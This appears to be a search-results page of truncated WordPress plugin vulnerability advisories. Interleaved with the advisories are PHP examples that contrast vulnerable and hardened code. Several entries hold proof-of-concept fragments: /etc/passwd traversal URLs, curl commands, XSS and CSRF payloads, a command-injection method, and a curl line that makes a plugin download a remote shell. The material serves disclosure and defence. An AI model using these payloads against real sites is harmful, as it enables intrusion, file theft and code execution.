4359 matches found
Ajax Load More <= 2.8.1.1 - Authenticated File Upload & Deletion
Authenticated file upload in ajax-load-more/admin/admin.php, in the function almsaverepeater. The variable $f is set to a predictable PHP file path, and the content of the variable $c is then written into that file. The following code proves that this second variable is also set from...
wordpress vertical image slider plugin < 1.2 - Cross-Site Scripting & CSRF
The lack of a CSRF check and of sanitisation could allow attackers to perform a Cross-Site Scripting attack against a logged-in administrator, as well as upload arbitrary files. XSS via CSRF: alert"XSS"' alert"XSS"' setTimeout'form1.submit', 1; Upload file via CSRF:...
MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
Plugin is still affected and has been closed. Typical local file inclusion vulnerability, from downloadpage.php. I tried to get RCE but did not succeed with /proc/self/environ or /var/log/apache2/access.log; include reports: Failed opening '/proc/self/environ' for inclusion...
WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
The following payload, placed in a page or post (it does not work in comments): TEST!!!caption width="1" caption='Click me...
EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary File Download
The plugin allows a WordPress site administrator or collaborator to download arbitrary files from the host file system through the plugin's functionality for downloading the .sql, .sql.zip or .sql.gz files created by the WordPress administrator. The file name to download is not sanitised, and path travers...
EZ SQL Reports <= 4.11.33 - Authenticated Arbitrary Code Execution
There are several calls to passthru() in the code; one of them receives the username, password, database name and host from $_POST arguments, so the ";" character (or others such as "&&" or "||") can be injected into any of these parameters to execute additional commands alongside "/usr/bin/mysql"...
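The pattern behind the entry above, as an added example that is not code from EZ SQL Reports: the unquoted command line beside a version that quotes every attacker-influenced token with escapeshellarg(). The parameter names (host, user, pass, db) and the sample input are constructed for the illustration.

```php
<?php
// Added example, not code from EZ SQL Reports: the shape of the OS command
// injection described above, beside a hardened version. The parameter names
// (host, user, pass, db) are hypothetical.

// Vulnerable: request values are interpolated straight into the command line
// that is handed to passthru(). A value such as  root; id #  terminates the
// mysql command and runs "id" with the web server's privileges.
function build_mysql_cmd_vulnerable(array $post): string
{
    return "/usr/bin/mysql -h {$post['host']} -u {$post['user']} "
         . "-p{$post['pass']} {$post['db']} -e 'SHOW TABLES'";
}

// Hardened: every attacker-influenced token goes through escapeshellarg(),
// which single-quotes it and escapes embedded quotes, so ; && || | ` and $()
// reach mysql as literal characters instead of being parsed by sh.
// Inside WordPress this should additionally sit behind current_user_can()
// and a nonce check; those calls are omitted so the file runs stand-alone.
function build_mysql_cmd_hardened(array $post): string
{
    foreach (['host', 'user', 'pass', 'db'] as $k) {
        if (!isset($post[$k]) || !is_string($post[$k])) {
            throw new InvalidArgumentException("missing parameter: $k");
        }
    }
    // Refuse values that are not a plausible host name / identifier at all;
    // this is defence in depth on top of the quoting, not a replacement for it.
    if (!preg_match('/^[A-Za-z0-9_.-]{1,128}$/', $post['host'])
        || !preg_match('/^[A-Za-z0-9_$-]{1,64}$/', $post['db'])) {
        throw new InvalidArgumentException('invalid host or database name');
    }
    return '/usr/bin/mysql'
         . ' -h ' . escapeshellarg($post['host'])
         . ' -u ' . escapeshellarg($post['user'])
         . ' -p'  . escapeshellarg($post['pass'])   // the shell joins this to -p'...'
         . ' '    . escapeshellarg($post['db'])
         . ' -e ' . escapeshellarg('SHOW TABLES');
}

// Constructed attacker input: the user name closes the command and appends "id".
$post = ['host' => 'localhost', 'user' => 'root; id #', 'pass' => 'x', 'db' => 'wp'];

echo "vulnerable: ", build_mysql_cmd_vulnerable($post), "\n";
echo "hardened:   ", build_mysql_cmd_hardened($post), "\n";
// The hardened line carries -u 'root; id #' as a single quoted argument, so
// passthru() of it would only fail mysql authentication rather than run "id".
```

Quoting alone is the actual fix; the allow-list on host and database name only narrows what can be passed through, and the whole code path still needs a capability check and a nonce in a real plugin.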
PowerPress Podcasting < 6.0.5 - Authenticated Cross-Site Scripting (XSS)
By exploiting a Cross-Site Scripting vulnerability the attacker can hijack a logged-in user's session by stealing cookies. This means the attacker can change the logged-in user's password and invalidate the victim's session while keeping their own access. 1. Log in to any...
Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload
The code in csv2wpecCouponFileUpload.php does not properly sanitise user input: it checks the file MIME type for x-php, but this can be bypassed when using the short code for "; $uploadfile="/var/www/s.pht"; $ch =...
Royal Slider <= 3.2.6 - Authenticated Cross-Site Scripting (XSS)
The vulnerability exists due to insufficient sanitisation of user-supplied data in the "rstype" HTTP GET parameter when creating or editing a slider. A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of...
WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The wp-symposium WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability: http://www.example.com/wp-content/plugins/wp-symposium/getalbumitem.php?size=alert/xss/...
Thumbnail Carousel Slider < 1.0.1 - Authenticated Shell Upload & CSRF
The original advisory states that this vulnerability is exploitable with the Editor and Author roles, but this is incorrect: by default only the Administrator role can trigger it. However, CSRF on the image upload form makes it exploitable by a malicious actor. Create a file named...
SEO Redirection < 2.9 - Authenticated Reflected Cross-Site Scripting (XSS)
The plugin was affected by an Authenticated Reflected Cross-Site Scripting (XSS) vulnerability in its settings page, via the search GET parameter: https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=%22+onmouseover%3Dalert%281%29+%3E...
WP Google Map Plugin < 3.0.0 - CSRF to Authenticated Cross-Site Scripting (XSS)
The lack of CSRF protection could allow attackers to perform an XSS attack against logged-in administrators. ' / ' /...
Google Adsense & Hotel Booking <= 1.0.5 - Open Proxy
Plugin is still affected and has been closed. The code in ./plugin/google-adsense-and-hotel-booking/proxy.php allows an arbitrary user to proxy POST requests through the host site. This may allow attackers to hide attacks, or to DoS a site if the POST request is pointed back at itself, causing a loop...
WP-Polls <= 2.70 - Stored Cross-Site Scripting (XSS)
The /wp-admin/admin.php?page=wp-polls%2Fpolls-add.php page is vulnerable to XSS within the pollqquestion and pollaanswers parameters. Add a new poll with the question or answer set to...
Hide My WP <= 4.53 - Stored-Cross Site Scripting (XSS)
An attacker can make a fake attack attempt, which will be logged, and inject JavaScript into the log entry: curl --referer 'you are using bad filtering for input ript alert"XSS here" ript; :; ;' http://example.com...
WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
The WordPress plugin wp-symposium version 15.5.1, and probably all previous versions, suffers from an unauthenticated SQL injection in getalbumitem.php, parameter 'size'. The issue is exploitable even if the plugin is deactivated. PoC URL:...
MP3-jPlayer <= 2.4.2 - Full Path Disclosure
The download.php code allows arbitrary users to disclose path information on WordPress sites with this plugin installed: $info = " Get: " . $mp3 . " Sent: " . $sent . " File: " . $file . " Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . " Root: " . $rooturl . " pID: "...
Job Manager <= 0.7.22 - Unauthenticated Stored Cross-Site Scripting (XSS)
The Job Manager WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. Go to the job listings page /index.php/jobs/apply/, click on "send through your résumé", and add the payload '" to the email field. The JavaScript will be executed on the...
Admin Pack by SITE CASEIRO <= 1.1 - Authenticated Stored Cross-Site Scripting (XSS)
The admin-pack-by-site-caseiro WordPress plugin was affected by an Authenticated Stored Cross-Site Scripting (XSS) vulnerability...
Ninja Forms <= 2.9.21 - Authenticated Reflected Cross-Site Scripting (XSS)
The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting (XSS) vulnerability: http://www.example.com/wp-admin/admin.php?page=nf-processing&title=alert123;...
Altos Connect Widget <= 1.3.0 - Unauthenticated Cross-Site Scripting (XSS)
The altos-connect WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) vulnerability: http://www.example.com/wp-content/plugins/altos-connect/jquery-validate/demo/demo/captcha/index.php/"alert1...
recent-backups <= 0.7 - Remote File Download
Plugin is still affected and has been closed. The code in download-file.php does not verify that the user is logged in, nor sanitise which files can be downloaded. This vulnerability can be used to download sensitive system files, such as the Linux passwd file. $ curl -v...
simple-image-manipulator <= 1.0 - Remote File Download
Plugin is still affected and has been closed. In ./simple-image-manipulator/controller/download.php no checks are made to authenticate the user or to sanitise the input that determines the file location. $ curl...
Hide My WP <= 4.51.1 - Stored Cross-Site Scripting (XSS)
An attacker can make a fake attack attempt carrying a JavaScript payload, which the plugin logs, resulting in stored XSS when the log is viewed. The attacker can also spoof their IP address in the logs by setting the X-Forwarded-For header. curl --referer ' // :; ;' --header 'X-FORWARDED-FOR: 8.8.8.8'...
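The two Hide My WP entries above describe the same mistake: an attacker-controlled header is logged and later rendered unescaped, and a forwarded-for header is trusted for the source address. The following is an added illustration of that pattern and its fix, not Hide My WP's code; the header values are constructed to mirror the curl commands above and the function and column names are hypothetical.

```php
<?php
// Added example, not Hide My WP's code: why logging attacker-controlled
// headers and rendering them unescaped in an admin page gives stored XSS, and
// how the fix looks. Header values are constructed; names are hypothetical.

// Constructed request: the Referer carries the payload, X-Forwarded-For is
// set by the attacker to forge the logged source address.
$server = [
    'REMOTE_ADDR'          => '203.0.113.9',
    'HTTP_REFERER'         => '<script>alert("XSS here")</script>',
    'HTTP_X_FORWARDED_FOR' => '8.8.8.8',
];

// Vulnerable logger: prefers the forwarded header for the IP and keeps the
// Referer exactly as sent.
function log_attempt_vulnerable(array $srv): array
{
    return [
        'ip'      => $srv['HTTP_X_FORWARDED_FOR'] ?? $srv['REMOTE_ADDR'],
        'referer' => $srv['HTTP_REFERER'] ?? '',
    ];
}

// Vulnerable admin view: the stored strings are concatenated into HTML, so
// the <script> in the log entry runs in the administrator's browser.
function render_vulnerable(array $row): string
{
    return '<tr><td>' . $row['ip'] . '</td><td>' . $row['referer'] . '</td></tr>';
}

// Hardened logger: record the TCP peer address (X-Forwarded-For is only
// trustworthy when a proxy you control overwrites it), validate it as an IP,
// and bound the stored Referer length.
function log_attempt_hardened(array $srv): array
{
    $ip  = filter_var($srv['REMOTE_ADDR'] ?? '', FILTER_VALIDATE_IP) ?: '0.0.0.0';
    $ref = substr((string) ($srv['HTTP_REFERER'] ?? ''), 0, 512);
    return ['ip' => $ip, 'referer' => $ref];
}

// Hardened view: escape at the point of output. Inside WordPress this is
// esc_html(); the plain-PHP equivalent is used here so the file runs alone.
function render_hardened(array $row): string
{
    $ip  = htmlspecialchars($row['ip'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $ref = htmlspecialchars($row['referer'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<tr><td>' . $ip . '</td><td>' . $ref . '</td></tr>';
}

echo render_vulnerable(log_attempt_vulnerable($server)), "\n";
echo render_hardened(log_attempt_hardened($server)), "\n";
```

Storing the raw Referer is acceptable as long as every rendering path escapes it; what cannot be fixed at output time is the forged source address, which is why the hardened logger records REMOTE_ADDR.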
Music Store <= 1.0.14 - Referer Header Open Redirect
The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect vulnerability. GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language:...
WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Authenticated Cross-Site Scripting (XSS) in the post/page text editor mode, exploitable by Editor users and up. link...
wptf-image-gallery 1.0.3 - Remote File Download
Plugin is still affected and has been closed. The ./wptf-image-gallery/lib-mbox/ajaxload.php code does not sanitise user input or check that the user is authorised to download files. This allows an unauthenticated user to download sensitive system files: $ curl...
Download Manager <= 2.7.94 - Authenticated Stored XSS
The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of an uploaded file. Example: .jpg The vulnerability exists because the file name is not properly sanitised, which leads to code injection that is executed in the target's browser...
Candidate Application Form <= 1.3 - Unauthenticated Arbitrary File Download
Plugin is still affected and has been closed. The code in downloadpdffile.php does not perform any sanity checks, allowing a remote attacker to download sensitive system files. $ curl...
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php The shell location is reported back t...
IBS Mappro <= 0.6 - Directory Traversal
The ibs-mappro WordPress plugin was affected by a Directory Traversal vulnerability: http://www.example.com/wp-content/plugins/ibs-mappro/lib/download.php?file=/etc/passwd...
Floating Social Bar <= 1.1.5 - Cross-Site Scripting (XSS)
The Floating Social Bar WordPress plugin was affected by a Cross-Site Scripting (XSS) vulnerability: http://www.example.com/wp-admin/admin-ajax.php?action=fsbsaveorder&items1="alert"XSS";...
NewStatPress <= 1.0.4 - SQL Injection
The search functionality is susceptible to SQL injection due to use of user input without sanitisation, in particular at line 98 of 'includes/nspsearch.php'. Using a specially crafted SQL query, we can trigger disclosure of user hashes through an IMG tag as the data channel. The...
NewStatPress <= 1.0.4 - Reflected Cross-Site Scripting (XSS)
The NewStatPress plugin uses, on lines 28 and 31 of the file 'includes/nspsearch.php', several variables from the $_GET scope without sanitisation. While WordPress automatically escapes quotes in this scope, the outputs on these lines are outside of quotes, and as such can be used to trigger ...
Image Export <= 1.1.0 - Directory Traversal
The image-export WordPress plugin was affected by a Directory Traversal vulnerability. $ curl http://www.example.com/wp-content/plugins/image-export/download.php?file=/etc/passwd...
WP e-Commerce Shop Styling <= 2.5 - Local File Inclusion
The code in ./wp-ecommerce-shop-styling/includes/download.php does not sanitise user input, allowing sensitive system files to be downloaded. You will have to rename the downloaded file (mv -- -..-..-..-..-..-..-..-..-etc-passwd passwd), as the file name is set to the download file name with pat...
StageShow <= 5.0.8 - Open Redirect
The StageShow WordPress plugin was affected by an Open Redirect vulnerability: http://www.example.com/wp-content/plugins/stageshow/stageshowredirect.php?url=http%3A%2F%2F2buntu.com...
Swim Team <= v1.44.10777 - Local File Inclusion
The code in ./wp-swimteam/include/user/download.php does not sanitise user input, allowing sensitive system files to be downloaded. $ curl...
MDC YouTube Downloader <= 2.1.0 - Local File Inclusion
The MDC YouTube Downloader WordPress plugin was affected by a Local File Inclusion vulnerability: http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd...
WP-CopyProtect <= 3.0.0 - CSRF & Stored Cross-Site Scripting (XSS)
The WP-CopyProtect (Protect your blog posts) plugin for WordPress is vulnerable to a persistent XSS attack on its settings screen, due to a lack of sanitisation of user input and the lack of a Cross-Site Request Forgery (CSRF) token (nonce). alert1'/ document.getElementById"form".submit;...
Multiple Themes - Privilege Escalation
The themes suffer from a privilege escalation vulnerability: any authenticated user can trigger it due to weak permission checks. An attacker can update options such as the default role for new users, the registration state and others, which may lead to executing commands/code on th...
WP Mobile Detector <= 3.2 - Stored Cross-Site Scripting (XSS)
The WP Mobile Detector plugin exposes the AJAX action 'websitezoptions' to all registered users, on line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php. Providing specially crafted form values results in a persistent XSS attack against mobile visitors. import requests s = requests.session...
wp-instance-rename <= 1.0 - Arbitrary File Download
The wp-instance-rename WordPress plugin was affected by an Arbitrary File Download vulnerability. $ curl --data "dbname=wp&dumpfname=/etc/passwd&backupfolder=." http://www.example.com/wp-instance-rename/mysqldumpdownload.php -o p.zip...
Erident Custom Login & Dashboard 3.4-3.4.1 - Stored Cross-Site Scripting (XSS)
The Erident Custom Login and Dashboard plugin calls update_option() when a specific POST field is submitted to the plugin's settings screen. No CSRF token is used, so if an administrative user can be tricked into visiting a site with a malicious form, it is possible to...
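The WP-CopyProtect and Erident entries above share one root cause: a settings screen that writes a POST field with update_option() without a nonce, capability check or sanitisation. The following is an added example of that shape beside a hardened WordPress settings handler; it is not the code of either plugin, assumes it runs inside WordPress as a plugin file, and uses hypothetical option, nonce and field names.

```php
<?php
// Added example, not the code of any plugin listed above: a WordPress settings
// handler in the CSRF-prone shape the advisories describe (a POST field written
// with update_option() and no nonce), beside a hardened version. Assumes it
// runs inside WordPress as a plugin file; option, nonce, page and field names
// are hypothetical.

// Vulnerable: any POST that reaches the screen is stored. A page the
// administrator is lured to can auto-submit such a form cross-site, and
// because the value is later echoed unescaped the result is stored XSS.
function demo_save_vulnerable()
{
    if (isset($_POST['demo_login_message'])) {
        update_option('demo_login_message', $_POST['demo_login_message']);
    }
}

// Hardened form: wp_nonce_field() embeds a token tied to the logged-in user
// and the action name, which a cross-site page cannot read or forge.
function demo_settings_form()
{
    $msg = get_option('demo_login_message', '');
    echo '<form method="post">';
    wp_nonce_field('demo_save_settings', 'demo_nonce');
    echo '<input type="text" name="demo_login_message" value="' . esc_attr($msg) . '">';
    submit_button();
    echo '</form>';
}

// Hardened handler: capability check, nonce verification, input sanitisation.
function demo_save_hardened()
{
    if (!isset($_POST['demo_login_message'])) {
        return;
    }
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges', '', ['response' => 403]);
    }
    // Calls wp_die() itself when the nonce is missing, expired or forged.
    check_admin_referer('demo_save_settings', 'demo_nonce');
    $clean = sanitize_text_field(wp_unslash($_POST['demo_login_message']));
    update_option('demo_login_message', $clean);
}

// Escape again where the option is rendered; sanitising on input is not a
// substitute for escaping on output.
function demo_login_message(string $message): string
{
    $msg = get_option('demo_login_message', '');
    if ($msg === '') {
        return $message;
    }
    return $message . '<p class="message">' . esc_html($msg) . '</p>';
}

add_action('admin_menu', function () {
    add_options_page('Demo settings', 'Demo', 'manage_options', 'demo-settings', 'demo_settings_form');
});
add_action('admin_init', 'demo_save_hardened');
add_filter('login_message', 'demo_login_message');
```

The three controls are independent: the capability check stops low-privilege accounts, the nonce stops a forged request from an administrator's browser, and the input/output handling stops a value that does get stored from executing as script.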
Ultimate Member 1.2.98-1.2.994 - Reflected Cross-Site Scripting (XSS)
The Ultimate Member plugin bundles the Redux Framework. The Redux Framework includes a script named 'class.p.php', which acts as an HTTP proxy. Using this script, it is possible to trigger a reflected XSS attack by loading data from a location controlled by the attacker. The data from this...
Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)
The users-to-csv WordPress plugin was affected by a Cross-Site Request Forgery (CSRF) vulnerability: http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=users http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=comments...
Yoast SEO <= 2.1.1 - Authenticated Stored DOM XSS
The "snippet preview" functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2. Vulnerable URL: /wp-admin/post-new.php?posttitle= Vulnerable code (wordpress-seo/js/wp-seo-metabox.js): function ystcleanstr if str == '' || str == undefined return...
Zip Attachments <= 1.1.4 - Arbitrary File Download
The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file: http://www.example.com/wp-content/plugins/zip-attachments/download.php?zafile=../../../../../etc/passwd&zafilename=passwd...
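The download.php entries above (recent-backups, simple-image-manipulator, wptf-image-gallery, Candidate Application Form, IBS Mappro, Image Export, WP e-Commerce Shop Styling, Swim Team, MDC YouTube Downloader and Zip Attachments) are all one bug class: a request parameter becomes the path that is read. The following is an added example of that pattern beside a resolver that confines the canonical path to an allowed directory; it is not code from any of those plugins, runs as plain PHP, and builds its own temporary files for the demonstration.

```php
<?php
// Added example, not code from any plugin listed above: the arbitrary file
// download pattern shared by the download.php entries (a request parameter used
// as the path to read), beside a hardened resolver. Plain PHP so it runs
// stand-alone; function names and the temporary layout are constructed.

// Vulnerable shape. Some of the plugins above pass the parameter to readfile()
// with no prefix at all, so ?file=/etc/passwd works directly; others prefix a
// base directory, which "../" sequences walk back out of, as in the
// zip-attachments URL above.
function resolve_vulnerable(string $base, string $file): string
{
    return $base . '/' . $file;
}

// Hardened: canonicalise with realpath(), which collapses "..", resolves
// symlinks and returns false for a non-existent path, then require the result
// to lie inside the allowed directory. A NUL byte is rejected first because
// PHP 8 filesystem functions refuse such paths with an exception.
function resolve_hardened(string $base, string $file): ?string
{
    if (strpos($file, "\0") !== false) {
        return null;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $file);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare with a trailing separator so /srv/uploads does not also match
    // /srv/uploads-private.
    if (strpos($target, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

// Inside a plugin the resolver would additionally be gated by
// is_user_logged_in()/current_user_can() and a nonce; that gate is what the
// "Unauthenticated" entries above lack entirely.

// Constructed layout in a temporary directory:
//   <tmp>/secret.txt           (outside the allowed directory)
//   <tmp>/uploads/report.sql   (inside it)
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dl_demo_' . getmypid();
mkdir($tmp . '/uploads', 0700, true);
file_put_contents($tmp . '/secret.txt', "outside\n");
file_put_contents($tmp . '/uploads/report.sql', "inside\n");

$base = $tmp . '/uploads';
foreach (['report.sql', '../secret.txt'] as $req) {
    $v = resolve_vulnerable($base, $req);
    $h = resolve_hardened($base, $req);
    printf("%-15s vulnerable -> %-9s hardened -> %s\n",
        $req,
        file_exists($v) ? 'readable' : 'not found',
        $h === null ? 'rejected' : basename($h));
}

// Remove the constructed files.
unlink($tmp . '/uploads/report.sql');
unlink($tmp . '/secret.txt');
rmdir($tmp . '/uploads');
rmdir($tmp);
```

Rejecting ".." with a string check is not enough on its own (encoded or mixed separators and symlinks slip past it); the realpath() comparison is the check that actually bounds what can be served, and the authentication gate is a separate requirement on top of it.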
Smart Website Tools by AddThis 4.0.6-5.0.2 - Stored XSS
The Smart Website Tools by AddThis plugin exposes an AJAX function called 'atasyncloading' in 'addthis/addthis-for-wordpress.php'. Access to this function is restricted to registered users but not to administrative users, meaning that anyone with an account on the target site c...